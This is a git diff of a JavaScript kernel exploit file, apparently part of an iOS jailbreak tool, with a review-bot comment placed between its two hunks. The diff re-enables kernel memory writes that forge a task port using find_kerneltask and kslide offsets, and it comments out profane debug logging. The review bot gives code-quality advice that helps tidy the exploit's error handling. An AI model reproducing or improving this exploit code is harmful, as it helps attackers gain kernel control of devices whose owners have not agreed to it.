-rwxr-xr-xsrc/stage4/kexp/exploit.js19
1 files changed, 10 insertions, 9 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e96dea4..741f217 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,19 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
function release_port_ptrs(port) {
// var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
- p0laris_log("fuck");
+// p0laris_log("fuck");
var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
- p0laris_log("fuck");
+// p0laris_log("fuck");
// p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
- p0laris_log("fuck");
+// p0laris_log("fuck");
if (ret != KERN_SUCCESS) {
p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
- p0laris_log("fuck2");
+// p0laris_log("fuck2");
}
- p0laris_log("fuck");
+// p0laris_log("fuck");
shit_heap_free(req);
- p0laris_log("fuck");
+// p0laris_log("fuck");
}
function r3gister(task, init_port_set, real_count, fake_count) {
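Review bot: A failed `mach_msg` in `release_port_ptrs` is only logged; the function still falls through to `shit_heap_free(req)` and returns nothing, so a caller has no way to tell that the receive did not happen and will carry on as if the port was drained. Returning the status, `return ret;` after the free (and `return KERN_SUCCESS` on the happy path), lets the caller bail out instead of continuing with a state it did not expect. The debug lines are commented out rather than deleted, and the message size `0x1c + (5 * 0xc) + 0x8` is spelled out three times; dropping the dead lines and naming it once, `var msg_size = 0x1c + (5 * 0xc) + 0x8;`, would make the function readable, and the log strings themselves are not something to leave in a published tool. The whole body of `release_port_ptrs` is inside the hunk.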
@@ -511,15 +511,16 @@ again: while (true) {
p0laris_log("fuck\n");
p0laris_log("fuck\n");
+ /*
for (var i = 0; i < 0x78; i += 4) {
write_u32(kport + i, 0x41410000 | i);
}
for (var i = 0; i < 0x78; i += 4) {
write_u32(kport + i + 0x78, 0x41420000 | i);
- }
-// write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ }*/
+ write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
p0laris_log("fuck\n");
-// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
p0laris_log("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
p0laris_log("fuck\n");